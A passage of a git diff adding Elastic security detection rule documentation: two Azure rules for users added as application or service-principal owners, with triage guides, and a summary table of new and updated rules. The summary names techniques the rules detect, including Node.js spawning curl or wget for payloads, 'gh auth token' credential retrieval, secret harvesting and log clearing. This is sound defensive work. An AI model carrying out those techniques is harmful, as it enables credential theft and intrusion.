https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc new file mode 100644 index 0000000000..6d246388a5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application]] +=== User Added as Owner for Azure Application + +Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating User Added as Owner for Azure Application* + + +Azure applications often require specific permissions for functionality, managed by assigning user roles. An adversary might exploit this by adding themselves or a compromised account as an owner, gaining elevated privileges to alter configurations or access sensitive data. The detection rule monitors audit logs for successful operations where a user is added as an application owner, flagging potential unauthorized privilege escalations. + + +*Possible investigation steps* + + +- Review the Azure audit logs to confirm the operation by filtering for event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to application" with a successful outcome. +- Identify the user account that was added as an owner and the account that performed the operation to determine if they are legitimate or potentially compromised. +- Check the history of activities associated with both the added owner and the account that performed the operation to identify any suspicious behavior or patterns. +- Verify the application's current configuration and permissions to assess any changes made after the new owner was added. +- Contact the legitimate owner or administrator of the Azure application to confirm whether the addition of the new owner was authorized. +- Investigate any recent changes in the organization's user access policies or roles that might explain the addition of a new owner. + + +*False positive analysis* + + +- Routine administrative actions: Regular maintenance or updates by IT staff may involve adding users as application owners. To manage this, create a list of authorized personnel and exclude their actions from triggering alerts. +- Automated processes: Some applications may have automated scripts or services that add users as owners for operational purposes. Identify these processes and configure exceptions for their activities. +- Organizational changes: During mergers or restructuring, there may be legitimate reasons for adding multiple users as application owners. Temporarily adjust the rule to accommodate these changes and review the audit logs manually. +- Testing and development: In development environments, users may be added as owners for testing purposes. Exclude these environments from the rule or set up a separate monitoring policy with adjusted thresholds. + + +*Response and remediation* + + +- Immediately revoke the added user's owner permissions from the Azure application to prevent further unauthorized access or configuration changes. +- Conduct a thorough review of recent activity logs for the affected application to identify any unauthorized changes or data access that may have occurred since the user was added as an owner. +- Reset credentials and enforce multi-factor authentication for the compromised or suspicious account to prevent further misuse. +- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals broader compromise. +- Implement additional monitoring on the affected application and related accounts to detect any further unauthorized access attempts or privilege escalations. +- Review and update access control policies to ensure that only authorized personnel can modify application ownership, and consider implementing stricter approval processes for such changes. +- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to application" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc new file mode 100644 index 0000000000..f6ec1e0a1e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal]] +=== User Added as Owner for Azure Service Principal + +Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating User Added as Owner for Azure Service Principal* + + +Azure service principals are crucial for managing application permissions within a tenant, defining access and capabilities. Adversaries may exploit this by adding themselves as owners, gaining control over application permissions and access. The detection rule monitors audit logs for successful owner additions, flagging potential unauthorized changes to maintain security integrity. + + +*Possible investigation steps* + + +- Review the audit log entry to confirm the event dataset is 'azure.auditlogs' and the operation name is "Add owner to service principal" with a successful outcome. +- Identify the user account that was added as an owner and gather information about this account, including recent activity and any associated alerts. +- Determine the service principal involved by reviewing its details, such as the application it is associated with and the permissions it holds. +- Check the history of changes to the service principal to identify any other recent modifications or suspicious activities. +- Investigate the context and necessity of the ownership change by contacting the user or team responsible for the service principal to verify if the change was authorized. +- Assess the potential impact of the ownership change on the tenant's security posture, considering the permissions and access granted to the service principal. + + +*False positive analysis* + + +- Routine administrative changes may trigger alerts when legitimate IT staff add themselves or others as owners for maintenance purposes. To manage this, create exceptions for known administrative accounts that frequently perform these actions. +- Automated processes or scripts that manage service principal ownership as part of regular operations can cause false positives. Identify and document these processes, then exclude them from triggering alerts by using specific identifiers or tags. +- Organizational changes, such as team restructuring, might lead to multiple legitimate ownership changes. During these periods, temporarily adjust the rule sensitivity or create temporary exceptions for specific user groups involved in the transition. +- Third-party applications that require ownership changes for integration purposes can also trigger alerts. Verify these applications and whitelist their associated service principal changes to prevent unnecessary alerts. + + +*Response and remediation* + + +- Immediately revoke the added user's ownership from the Azure service principal to prevent unauthorized access and control. +- Conduct a thorough review of the affected service principal's permissions and access logs to identify any unauthorized changes or access attempts. +- Reset credentials and update any secrets or keys associated with the compromised service principal to mitigate potential misuse. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement conditional access policies to restrict who can add owners to service principals, ensuring only authorized personnel have this capability. +- Enhance monitoring and alerting for similar activities by increasing the sensitivity of alerts related to changes in service principal ownership. +- Document the incident and response actions taken to improve future incident response and refine security policies. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to service principal" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc new file mode 100644 index 0000000000..15e9a10f85 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc @@ -0,0 +1,125 @@ +["appendix",role="exclude",id="prebuilt-rule-8-19-8-prebuilt-rules-8-19-8-appendix"] += Downloadable rule update v8.19.8 + +This section lists all updates associated with version 8.19.8 of the Fleet integration *Prebuilt Security Detection Rules*. + + +include::prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc[] +include::prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc[] +include::prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc[] +include::prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc[] +include::prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc[] +include::prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc[] +include::prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc[] +include::prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc[] +include::prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc[] +include::prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc[] +include::prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc[] +include::prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc[] +include::prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc[] +include::prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc[] +include::prebuilt-rule-8-19-8-aws-sts-role-chaining.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc[] +include::prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc[] +include::prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc[] +include::prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc[] +include::prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-event-hub-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-firewall-policy-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc[] +include::prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc[] +include::prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc[] +include::prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc[] +include::prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc[] +include::prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc[] +include::prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc[] +include::prebuilt-rule-8-19-8-azure-external-guest-user-invitation.asciidoc[] +include::prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc[] +include::prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc[] +include::prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc[] +include::prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc[] +include::prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc[] +include::prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc[] +include::prebuilt-rule-8-19-8-azure-event-hub-authorization-rule-created-or-updated.asciidoc[] +include::prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc[] +include::prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc[] +include::prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc[] +include::prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc[] +include::prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-dlp-policy-removed.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-policy-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-malware-filter-rule-modification.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-safe-link-policy-disabled.asciidoc[] +include::prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-teams-custom-application-interaction-allowed.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-teams-external-access-enabled.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-creation.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-unusual-volume-of-file-deletion.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-user-restricted-from-sending-email.asciidoc[] +include::prebuilt-rule-8-19-8-o365-email-reported-by-user-as-malware-or-phish.asciidoc[] +include::prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc[] +include::prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-exchange-management-group-role-assignment.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-365-teams-guest-access-enabled.asciidoc[] +include::prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc[] +include::prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc[] +include::prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc[] +include::prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc[] +include::prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc[] +include::prebuilt-rule-8-19-8-attempt-to-disable-syslog-service.asciidoc[] +include::prebuilt-rule-8-19-8-dynamic-linker-creation-or-modification.asciidoc[] +include::prebuilt-rule-8-19-8-kill-command-execution.asciidoc[] +include::prebuilt-rule-8-19-8-dynamic-linker-ld-so-creation.asciidoc[] +include::prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc[] +include::prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc[] +include::prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc[] +include::prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc[] +include::prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc[] +include::prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-windows-powershell-arguments.asciidoc[] +include::prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc[] +include::prebuilt-rule-8-19-8-unusual-file-operation-by-dns-exe.asciidoc[] +include::prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc[] diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc new file mode 100644 index 0000000000..15a92e94bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc @@ -0,0 +1,250 @@ +[[prebuilt-rule-8-19-8-prebuilt-rules-8-19-8-summary]] +[role="xpack"] +== Update v8.19.8 + +This section lists all updates associated with version 8.19.8 of the Fleet integration *Prebuilt Security Detection Rules*. + + +[width="100%",options="header"] +|============================================== +|Rule |Description |Status |Version + +|<> | This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. | new | 1 + +|<> | Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. | new | 1 + +|<> | Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. | new | 1 + +|<> | Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. | new | 1 + +|<> | Identifies sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. | new | 1 + +|<> | Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. | new | 1 + +|<> | This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. | new | 1 + +|<> | This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. | new | 1 + +|<> | This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". | new | 1 + +|<> | This rule detects the execution of Node.js pre or post-install scripts. These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. | new | 1 + +|<> | Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. | new | 1 + +|<> | Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. | new | 1 + +|<> | This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. | new | 1 + +|<> | Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijack execution flow of a process via threats priority manipulation. | new | 1 + +|<> | Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. | update | 6 + +|<> | Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. | update | 7 + +|<> | This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. | update | 3 + +|<> | Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This is a new terms rule that looks for the first occurance of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). | update | 3 + +|<> | Identifies concurrent azure signin events for the same user and from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. | update | 3 + +|<> | Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attemopt to brute-force TOTP codes by generating several sessions and attempt to guess the correct code. | update | 5 + +|<> | Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. | update | 107 + +|<> | Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. | update | 3 + +|<> | Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. | update | 5 + +|<> | Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies. | update | 3 + +|<> | Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. | update | 107 + +|<> | Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. | update | 106 + +|<> | Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. | update | 106 + +|<> | Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. | update | 108 + +|<> | Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. | update | 106 + +|<> | Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. | update | 106 + +|<> | Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. | update | 106 + +|<> | Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. | update | 106 + +|<> | Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. | update | 106 + +|<> | Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. | update | 106 + +|<> | Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. | update | 106 + +|<> | Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. | update | 106 + +|<> | Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. | update | 